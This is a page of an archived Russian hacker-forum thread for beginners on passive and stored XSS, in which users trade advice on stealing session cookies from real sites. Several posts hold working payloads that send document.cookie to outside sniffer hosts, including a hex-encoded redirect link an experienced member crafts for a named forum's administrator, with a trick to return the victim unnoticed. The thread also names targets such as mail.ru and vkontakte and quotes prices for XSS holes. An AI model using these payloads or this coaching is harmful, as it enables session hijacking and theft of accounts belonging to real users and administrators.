Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Пассивные и Активные XSS - теория и практика

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> RE: Пассивные и Активные XSS - теория и практика
Имя
Сообщение << Старые топики   Новые топики >>
RE: Пассивные и Активные XSS - теория и практика - 2009-03-18 23:37:54.256666   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
Pashkela, это мне и надо возвращает туда, откуда пришли
Post #: 81
RE: Пассивные и Активные XSS - теория и практика - 2009-03-21 14:29:43.190000   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
Привет!возможно ли такой скрипт спрятать в pdf формате ,если да то как .
<script language="JavaScript">
document.location.href="http://bla.yandex.ru/bla.blal?text=%22%3E%3Cscript%20src=http://bla.narod.ru/mail.js%3E%3C/script%3E%22%3E%3Cscript%20src=http://bla.narod.ru/mail.js%3E%3C/script%3E"
</script>
Post #: 82
RE: Пассивные и Активные XSS - теория и практика - 2009-03-21 14:41:43.933333   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666

quote:

ORIGINAL: bobik23

Привет!возможно ли такой скрипт спрятать в pdf формате ,если да то как .
&lt;script language="JavaScript"&gt;
document.location.href="http://bla.yandex.ru/bla.blal?text=%22%3E%3Cscript%20src=http://bla.narod.ru/mail.js%3E%3C/script%3E%22%3E%3Cscript%20src=http://bla.narod.ru/mail.js%3E%3C/script%3E"
&lt;/script&gt;

Смысл прятать скрипт в pdf??? Это текстовый формат, с поддержкой картинок,( если просто говороть) такие вещи прячут либо в батниках либо web файлах, а в pdf прятать бессмыслено, он у тебя просто текстом будет и все!!!
Post #: 83
RE: Пассивные и Активные XSS - теория и практика - 2009-03-21 15:48:29.293333   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
 Уязвимость существует из-за ошибки проверки входных данных в JavaScript функциях.
Используя "Trigger Action" в документе PDF возможно выполнить код в контексте сервера


Post #: 84
RE: Пассивные и Активные XSS - теория и практика - 2009-05-04 19:14:34.506666   
maulo

Сообщений: 4
Оценки: 0
Присоединился: 2009-05-04 16:12:29.513333
Спасибо оно мне очень помогло тока скажите пожалуста как найти xss уязвимости на таких сайтах как mail.ru ?
Post #: 85
RE: Пассивные и Активные XSS - теория и практика - 2009-05-04 19:17:32.056666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
2 maulo:

очень просто - искать их. Только сначала осознать, что такое майл.ру и какой опыт в XSS у тебя
Post #: 86
RE: Пассивные и Активные XSS - теория и практика - 2009-05-21 19:30:21.826666   
quex

Сообщений: 6
Оценки: 0
Присоединился: 2009-05-17 03:13:40.266666
всем привет. пытаюсь понемногу овладеть искусством xss =)
так вот, на одном из форумов нашел активную xss
т.е. при отправке сообщения такого содержания при каждом обновлении странички вылетает преславутая табличка
знаки <,> и " фильтруются, символ ' - нет.
на какой код нужно заменить alert() чтобы перехватить кукисы с помощью яваскриптинга?
пробывал
что по сути неправильно, происходит тупо редирект на 'http://путь_до_моего_сниффера.com/s.gif?'+document.cookie; и кукисов соответственно нет.
просто тоже не прокатывает.
сниффер вроде рабочий, проверял, отчеты были.
Post #: 87
RE: Пассивные и Активные XSS - теория и практика - 2009-05-21 21:14:33.876666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000


Тупо редирект и должен происходить, нормальный снифер в первом посте темы

+ возможно надо захексить ссылку

PS: "Тупой" редирект и означает именно то, что javasсriрt работает, что и требовалось доказать
Post #: 88
RE: Пассивные и Активные XSS - теория и практика - 2009-05-25 02:09:43.713333   
SEKTOR3

Сообщений: 60
Оценки: 0
Присоединился: 2009-05-01 20:05:07.270000
Прив всем,
в форме найдена хss  могу-ли я сделать ссылку прямь на снифер ,или лучше сперва на js.js тоесть на этот скрипт img = new Image(); img.src = "http://ссылка на снифер?"+document.cookie; ну а после этот скрипт перебросит на снифер
<form action="/order/" method="POST">
           <table border="0" class="form">
               <tr>

                   <td width="150">Компания(ИП):</td>
                   <td><input maxLength=30 type="" name="company" value=""&gt;&lt;script&gt;alert('1')&lt;/script&gt;"></td>
               </tr>
               <tr>
                   <td width="150">Телефон компании:</td>
                   <td><input maxLength=30 type="hidden" name="company_tel" value=""></td>
               </tr>

              
               <tr>
                   <td width="150">Контактное лицо:</td>
                   <td><input maxLength=30 type="text" name="name" value=""></td>
               </tr>
               <tr>
                   <td>E-mail:</td>
                   <td><input maxLength=30 type="text" name="mail" value=""></td>
               </tr>

               <tr>
                   <td valign="top">Телефон:</td>
                   <td valign="top"><input id="telInput" maxLength=30 type="text" name="tel"  value=""><br>
                       <font size=1><b>* не забудьте указать код города</b></font></td>
               </tr>
               <tr>
                   <td colspan="2">
                       <textarea id="orderInput" style="width: 700px; height: 80px;" name="message"></textarea>

                       <input type=hidden name="user_ip" value="">
                       <input type="hidden" name="send" value="1">
                   </td>
                  
               </tr>
               <tr>
                   <td colspan="2">
                       <div align="right"><input type="submit"  class="button" value="Отправить" name="submit">&nbsp;<input type="reset"  class="button" value="Очистить" name="reset"></div>
                   </td>
                  
               </tr>

          
           </table>

       </td>
_____________________________________________________________________________________
вот примерно если будет выглядеть так (ссылка на сниффер)
и вместо type="text" вставить type="hidden"и залить это все на народ.ру ,и кинуть ссылку жертве ,
будет ли эфект прийдет-ли на QUERY:что-нить,

извиняюсь если что-то не-так

<form action="/order/" method="POST">
            <table border="0" class="form">
                <tr>

                    <td width="150">Компания(ИП):</td>
                    <td><input maxLength=30 type="" name="company" value=""&gt;&lt;img src=http://ссылка на сниффер.gif"></td>
                </tr>
                <tr>
                    <td width="150">Телефон компании:</td>
                    <td><input maxLength=30 type="hidden" name="company_tel" value=""></td>
                </tr>

               
                <tr>
                    <td width="150">Контактное лицо:</td>
                    <td><input maxLength=30 type="text" name="name" value=""></td>
                </tr>
                <tr>
                    <td>E-mail:</td>
                    <td><input maxLength=30 type="text" name="mail" value=""></td>
                </tr>

                <tr>
                    <td valign="top">Телефон:</td>
                    <td valign="top"><input id="telInput" maxLength=30 type="text" name="tel"  value=""><br>
                        <font size=1><b>* не забудьте указать код города</b></font></td>
                </tr>
                <tr>
                    <td colspan="2">
                        <textarea id="orderInput" style="width: 700px; height: 80px;" name="message"></textarea>

                        <input type=hidden name="user_ip" value="">
                        <input type="hidden" name="send" value="1">
                    </td>
                   
                </tr>
                <tr>
                    <td colspan="2">
                        <div align="right"><input type="submit"  class="button" value="Отправить" name="submit">&nbsp;<input type="reset"  class="button" value="Очистить" name="reset"></div>
                    </td>
                   
                </tr>

           
            </table>

        </td>
_____________
Post #: 89
RE: Пассивные и Активные XSS - теория и практика - 2009-06-03 05:44:03.380000   
XANer

Сообщений: 114
Оценки: 0
Присоединился: 2009-05-25 01:04:23.160000
Т.е. всю фигню с XSS нада делать ручками?? или проги тоже есть?? 
Post #: 90
RE: Пассивные и Активные XSS - теория и практика - 2009-06-14 18:52:38.673333   
Life7

Сообщений: 119
Оценки: 0
Присоединился: 2009-05-31 13:20:37.243333
У кого есть XSS для Вконтакте
Post #: 91
RE: Пассивные и Активные XSS - теория и практика - 2009-06-28 02:53:51.320000   
LEADER~

Сообщений: 4
Оценки: 0
Присоединился: 2009-06-28 00:28:38.010000
Возможен взлом vkontakte.ru с помощью етой темы ?
Хотя там походу нету ХСС поиск не съедает <script>
Post #: 92
RE: Пассивные и Активные XSS - теория и практика - 2009-07-01 19:31:57.476666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
XSS там есть, пассивки - 200$, активки - 400$ (одна штука)

ЗЫЖ Еще как можно
Post #: 93
RE: Пассивные и Активные XSS - теория и практика - 2009-07-04 21:07:59.873333   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
Господа, возник такой вопрос.
Можно ли провести XSS, если строка пропускается через strip_tags()?
Post #: 94
RE: Пассивные и Активные XSS - теория и практика - 2009-07-06 01:15:04.360000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
Возможно. Копай в сторону UTF-7

http://openmya.hacker.jp/hasegawa/security/utf7cs.html
Post #: 95
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 15:14:06.213333   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
здаравствуйте хакеры !)
у меня такой вопрос…на сайте, который я хочу с помощью XSS взломать есть

некий фильтр XSS - например когда вставляешь <script>alert();</script>

фильтр гасит его в  %3Cscript%3Ealert();%3C/script%3E.
что делать как его обойти ?? есть ли способы ?
или посоветуйте другой тип атаки..может инъекцию попробывать ?

кому интересно это сайт http://www.darkorbit.com/ =)

P.S. кому не жалко дайте ЛЮБОЙ сайт с XSS…мне потренироваться надо..=))
Post #: 96
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 15:43:15.120000   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
quote:

%3Csсriрt%3Ealert();%3C/sсriрt%3E

Где тебе выводится эта строка, именно на странице или в поле адреса?
Post #: 97
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 17:28:28.083333   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
именно в строке адреса….там фильтр меняет <sсriрt>alert();</sсriрt> на %3Csсriрt%3Ealert();%3C/sсriрt%3E
всё - таки посоветуйте какой-нить сайт (любой)  с XSS…а то вконтакте её можно полжизни искать))
Post #: 98
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 17:30:41.426666   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
кстати народ никто не знает остались ли вконтакте или на крупных почтовиках XSS ?? или всё оговоренное на форуме быстренько прикрыли админы ? =))
Post #: 99
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 19:00:01.530000   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
quote:

именно в строке адреса….там фильтр меняет &lt;sсriрt&gt;alert();&lt;/sсriрt&gt; на %3Csсriрt%3Ealert();%3C/sсriрt%3E

Причем тут фильтрация???
Эту замену делает твой браузер. Символы < и > запрещены для передачи в URL. На сервере строка раскодируется и будет <sсriрt>alert();</sсriрt>.
Ты какой запрос составлял?
Post #: 100
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 19:39:26.253333   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
http://www.имя сайта/index.es?action=<script>alert();</script>
я пока на стадии тупенького лола, поэтому извиняюсь….=))
вообще принцип ХСС - атаки в том что джаваскрипт вставляется  в инпуты страницы и потом выполняется в браузере если я правильно понимаю ??
———————————————
я прочел статью по ХСС…..теперь вот перевариваю =))
Post #: 101
RE: Пассивные и Активные XSS - теория и практика - 2009-07-15 20:04:20.356666   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
quote:

вообще принцип ХСС - атаки в том что джаваскрипт вставляется в инпуты страницы и потом выполняется в браузере если я правильно понимаю ??

Не обязательно в инпуты, а вообще на страницу.
Post #: 102
RE: Пассивные и Активные XSS - теория и практика - 2009-08-06 10:40:07.486666   
wmz38

Сообщений: 1
Оценки: 0
Присоединился: 2009-08-06 10:30:40.913333
quote:

ORIGINAL: Pashkela

quote:

ORIGINAL: papst
.и с помощью открытки на mail.ru можно стащить cookies.


Таки чтобы это сделать, надо найти XSS не где-нибудь, а на mail.ru

Ты уже сделал это?:D

И совет - юзать надо свои сниферы, ссылка на рабочий снифер в 1-ом посте темы в самом низу. Не надо делиться приватной информацией со всеми, кому не лень

ссылка убита дружище, перезалей плз
Post #: 103
RE: Пассивные и Активные XSS - теория и практика - 2009-08-06 10:54:02.283333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
done
Post #: 104
RE: Пассивные и Активные XSS - теория и практика - 2009-08-07 03:10:46.456666   
t1to

Сообщений: 43
Оценки: 0
Присоединился: 2009-06-05 15:21:36.576666

quote:

ORIGINAL: Pashkela

XSS там есть, пассивки - 200$, активки - 400$ (одна штука)

ЗЫЖ Еще как можно

а сколько може стоить на mail.ru
Post #: 105
RE: Пассивные и Активные XSS - теория и практика - 2009-08-08 10:57:25.750000   
Gatihno

Сообщений: 23
Оценки: 0
Присоединился: 2009-02-15 16:29:58.816666
quote:

А)
Ужасна распастраннёная узявимость типа "&gt;
т.е. в каждой переменной пишем
"&gt;&lt;sсriрt&gt;alert()&lt;/sсriрt&gt;
и проверяем после отправки, открываем html и ищем слово
alert т.е. ищем ответ сайта и что с запросом сделал фильтр.
Если вы обнаруживаете, что-то типа alert() или
"&gt;alert()
или
&lt;sсriрt /&gt;alert()&lt;/sсriрt&gt;
т.е. фильтр разришает отправлять и выполнять кавычки, он только
преобразует запрос =&gt; то тогда вы нашли XSS.
Остаёться только правильно составить запрос, чтобы он
выполнился.


У меня получается alert() Подскажите, пожалуйста, как правильно составить запрос.
Post #: 106
RE: Пассивные и Активные XSS - теория и практика - 2009-10-15 17:29:19.023333   
koteotake

Сообщений: 4
Оценки: 0
Присоединился: 2009-10-15 17:04:32.226666
А можно спереть кукис, если сайт не использует XSS?
Post #: 107
RE: Пассивные и Активные XSS - теория и практика - 2009-10-15 17:32:50.343333   
][aKER_теоретик

Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
del.
Post #: 108
RE: Пассивные и Активные XSS - теория и практика - 2009-11-04 23:59:30.866666   
chipsa

Сообщений: 58
Оценки: 0
Присоединился: 2009-07-10 18:20:31.206666
http://berserk.mail.ru/index.php?'%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Eid=239
вот на ачате нашел такую ксс. Как возможно сдесь вместо алерта сделать отправку или вывод куков??

Надеюсь ктонибудь да подскажет.
Post #: 109
RE: Пассивные и Активные XSS - теория и практика - 2009-11-05 17:20:21.820000   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
эту xss кажись прикрыли, во всяком случае у меня она не работает.
чтобы стырить куки, надо перенаправить их на сниффер, который их и запишет к себе в лог.
юзай снифферы  - их очень много, к примеру http://hacker-pro.net/sniffer/
или напиши собственный при знании php выше чайничного
Post #: 110
RE: Пассивные и Активные XSS - теория и практика - 2009-11-22 02:24:31.266666   
Elisaveta

Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
#!/bin/Elisaveta

Здравствуйте премногоуважаемые участники форума;леди и джентельмены,сеньоры и сеньориты,дамы и господа,братья и сЕстры,товарищи,ДРУЗЬЯ!-Мир вашему дому!
Прежде чем вставить свои весомые пять копеек в дело свободы и демократии хочу сказать что пару месяцев назад,до чтения ваших публикаций о взломе,имела гораздо меньше представления о различных методах в целом,XSS и SQL-уязвимостях в частности.Почитала форум,особенно понравился раздел *BAT-файлов,XSS и обход фильтров.Там так много вкусного.Ажн удержаться от соблазнов трудно.Но знаний пока ещё мало.(Трудное,тяжёлое детство.Деревянные игрушки…И вот дорвалась до высоких технологий.Несколько лет назад оставила старенький ноутбок про запас,подобрала те детальки что мне по-кайфу и собрала свой суперкомп.Так что-мы ещё дадим стране угля! Надеюсь покопаться не только в серверах но и мозгах…)Заранее прошу прощения что пишу в этой теме не только о cross seite scripting-е.))

Началось всё с того что после чтения ваших советов решила заняться практикой и залить на бесплатный хост пару html-файликов.Конечно не без некоторых технических неувязочек,но всё прошло как нельзя лучше.Заимела свою халявную страничку.Потёрла index.нtml,залила пока свой по-ftp ,с простым содержанием:-Фейк-свежесостряпанный.(Кстати,знания почерпнула из форума и электронной версии ][akep.ru)
А под конец пьесы и ТОЛЬКО РАДИ ИССЛЕДОВАНИЯ БЕЗОПАСНОСТИ(должна-же я знать как они охраняют мои данные,ведь правильно?) подставила одинарную кавычку после числового значения ID в адресной строке моей любимой оперы на сайте хостинговой кампании.Электронный агрегат на той стороне озадачился и выдал
——————————————————————————————————————————————————–
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /storage/home/dombt2y3/fortdomains.com/site.php online 22.
——————————————————————————————————————————————————–
Решила оставить всё как есть до лучших времён-то бишь до вечера.А как стемнеет-новыми силами,с шашкой да на бронепоезд.Однако подлые,коварные администраторы зря хлеб на экстременты(для тех кто в танке-это не эксперементы,а дерьмо) не переводили и к вечеру исправили ошибку.Не дали благородной пташке порезвиться.Пришлось искать что-то новое.Обратила внимание на один портал к которому я давно хочу получить админский доступ.После тяжёлых и кровопролитных боёв сервер выплюнул:
—————————————————————————————————————————————————————-
Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 Server at www.cgi-bin.ru Port 80
—————————————————————————————————————————————————————-
Но и здесь недолго музыка играла.Ровно до следующего дня.Продвинуться не удалось.
Совсем обозлившись на весь белый свет,свою беспечность и недостатки навыков по-исследованиям чужих серверов во все возможные поля полетели различные вариации подарков типа:
<script>alert('xss')</script>
-Везде ждал облом.Как косой по-вашим…,(как там в правилах:Из песни слов не выкинешь?)Фильтры не зря хлеб(пардон)пробелы и кавычки жрали.Они говорили:
Душа поёт,природа шепчет,бери билет канай на море.И вообще,Красавица,не суй свой нос туда-куда ни одна собака свой (][)..,прибор не суёт.Видимо не знали:-Мы не привыкли отступать и любим очень мы читать-киножурнал ХОЧУ ВСЁ ЗНАТЬ.(Уже хотела порчу наводить-устоить админам и модераторам ковровые бомбандировки-то бишь попробовать засыпать их вредными *.bashrc по-доброте душевной,благо e-mail админа,модераторов и кассы взаимопомощи имелись)
Но что-то остановило и совсем отчаявшись закодировала
"><script>alert(0)</script>
и в адресной строке браузера вставила после
http://foren.g*.ru/tvsat.html?Cat=
зашифрованный запрос
%22%3E%3Cscript%3Ealert(0)%3C/script%3E
И.,-появились java-script окошки.С моим нулём в середине.
Полностью ссылка в браузере выглядит так :
———————————————————————————————
http://foren.g*.ru/tvsat.html?Cat=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
———————————————————————————————
Меня терзают смутные сомнения-не пассивную-ли XSS сыскала я.А по-существу:Если-да,
*1)-Правильно-ли составила эта безответственная гражданка ссылку админу для последующего угона coockies на паблик сниффер?Если нет-то КАК ПРАВИЛЬНО ей составить ссылку или ява-скриптик администратору сайта с пассивной XSS-уязвимостью.
*2)-Верно-ли я понимаю смысл XSS для приватизации cockie?К примеру админ сайта должен быть послан сперва на Х(из песни снова слов не выкинешь) потом на ссылку с найденной XSS,затем на сниффер и опосля (по-желанию)перенаправлен на деревню к дедушке точка.xy…
Подскажите красивые,умные,добрые люди бедной,несчастной,юной девушке осваивающей азы скриптов и запросов.Вы-моя последняя надежда.(Только не бейте дяденьки и тётеньки начинающую, и не отбивайте у неё желание творить самое чистое,доброе,ясное.)И простите Бога ради за длинный монолог и возможные ошибки.Думала грешным делом что безграмотная это-я.А почитала фундаментально-монументальные труды участников…))Ведь по-большому счёту вам это зачтётся.В плюс.
—————————————————————————————–
*Мой(не знаю правильно или нет)составленный подарок Администратору :
—————————————————————————————————————————–
http://foren.g*.ru/tvsat.html?Cat=%22%3E%3Cscript%3Ealert(0)%3C/script%3E = new Image(); img.src =
"http://hacker-pro.net/sniffer/index.php"+document.cookie;</sсriрt>
——————————————————————————————————————————
P.S.Кстати о птичках:свободного времени у меня немерянно.Так что с нетерпением ожидаю ваших советов…
P.P.S.А журнал ][-у вас классный.Засим прощаюсь..,с большим и пламенным приветом!Надеюсь,жду,Елизавета…
Post #: 111
RE: Пассивные и Активные XSS - теория и практика - 2009-11-22 04:25:15.650000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
)) Да, показывать админу олёрт (0) - это сильно) Лучше так хотя бы:

http://foren.g*.ru/tvsat.html?Cat=%22%3E%3Csсriрt%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%27%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%2D%70%72%6F%2E%6E%65%74%2F%73%6E%69%66%66%65%72%2F%69%6E%64%65%78%2E%70%68%70%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2Fsсriрt%3E

и не забыть со снифера вернуть админа взад:

<sсriрt>history.go(-1)</sсriрt>

И да, это пассивка, конечно же, активка - это когда клиенту ничего жать, тыцкать не приходится, достаточно просто посетить зло-страницу, т.е. активка - это javasсriрt, вшитый в код страницы, находящийся там постоянно после проведения определенной работы

т.е. чтобы совсем понятно - олерт (0) - это для нас, чтобы понять, что есть XSS, а свой злой код перенаправления надо вставлять уже потом как раз вместо олерта, не надо пугать бедных админов
Post #: 112
RE: Пассивные и Активные XSS - теория и практика - 2009-11-23 13:24:36.790000   
Elisaveta

Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
Pashkela-спасибо за помощь.Пускай по-жизни светит тебе только зелёный свет и на твоей улице будут почаще переворачиваться грузовики с сахаром или с тем,-что твоя душа пожелает…

Если я правильно поняла из твоего примера,-в ссылке админу мне надо подставить в конце вместо
</sсriрt>
<sсriрt>history.go(-1)</sсriрt>
зашифровать,и ему отправить,правильно?
Различия между пассивной и активной XSS думаю что знаю,как и то-что писать после alert('Elisaveta') в скобках(актвную можно загрузить как js-картинку на сайт с уязвимостью и каждый просматривающий её будет подвержен чудесам чёрной магии-исчезновению cockie на сниффер.Однако загружать файлы с расширением js на этот сайт неразрешено.Пробовала создать свой фотоальбом…)),просто хотелось стопудово быть уверенной-что это точно пассивная XSS.
Post #: 113
RE: Пассивные и Активные XSS - теория и практика - 2009-11-23 17:13:30.140000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
вот это

<sсriрt>history.go(-1)</sсriрt>

надо писать в самом коде снифера (расположенном на твоем сайте), чтобы после того, как чувака туда кинет (с куками) вернуло бы обратно. Админу надо просто впарить вместо алер(0) перенаправление на свой снифер + document.cookie
Post #: 114
RE: Пассивные и Активные XSS - теория и практика - 2009-11-23 19:42:03.313333   
Elisaveta

Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
Pashkela,-Сенкью вери мач!
Post #: 115
RE: Пассивные и Активные XSS - теория и практика - 2009-11-24 18:27:28.823333   
Elisaveta

Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
Ещё вопрос можно?
Правильно я шарю,-если нет возможности использовать sql-уязвимость-стоит попробовать найти и заюзать XSS?А не наоборот.И скуль по-идее лучше пассивной XSS.
Т.к. пассивная XSS зависит от ответных действий администратора,а в случае sql-иньекции можно получить права root без участия оного.
P.S.Кстати опять о птичках,-пускай Xakep9009 не терзается насчёт девушек.Его уроки для начинающих не прошли даром…Многие администраторы готовы дать ему медаль,или даже орден.Посмертно…
Post #: 116
RE: Пассивные и Активные XSS - теория и практика - 2010-01-02 23:53:32.893333   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
своими собственными руками я нашелпассивку на мейл.ру
http://travel.mail.ru/?mod=story&hotel_id=4334&%22%3E%3Cscript%3Ealert(%22hacked%20by%20daniel_1024%22)%3C/script%3E
почему то при вставке вместо алерта кода для отправки куков на пхп ничего не происходит…код составлен правильно…но не работает…в чем причина ?
Post #: 117
RE: Пассивные и Активные XSS - теория и практика - 2010-01-03 11:33:42.523333   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
quote:

при вставке вместо алерта кода для отправки куков на пхп ничего не происходит

А с чего это при вставке PHP-кода вообще должно что-то произойти? Жабускрипт вставлять надо. И то, далеко не факт, что прокатит.
Post #: 118
RE: Пассивные и Активные XSS - теория и практика - 2010-01-03 12:08:24.296666   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
тьфу…я не правильно выразился..конечно джаваскрипт:
<script>img = new Image(); img.src = "адрес сниффера"+document.cookie;</script>
на других сайтах с xss пробывал - всё работает…а на mail.ru нет…
Post #: 119
RE: Пассивные и Активные XSS - теория и практика - 2010-01-03 17:12:34.880000   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
Первое, что приходит в голову - фильтр. Алерт пропускает, но не более. Рассчитывать на чистенький XSS на мейле не приходится.
Хотя можно, конечно, поэкспериментировать над фильтром, проверить его на вшивость…
Post #: 120
Страниц:  1 2 [3] 4 5
Все форумы >> [Для начинающих] >> RE: Пассивные и Активные XSS - теория и практика







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.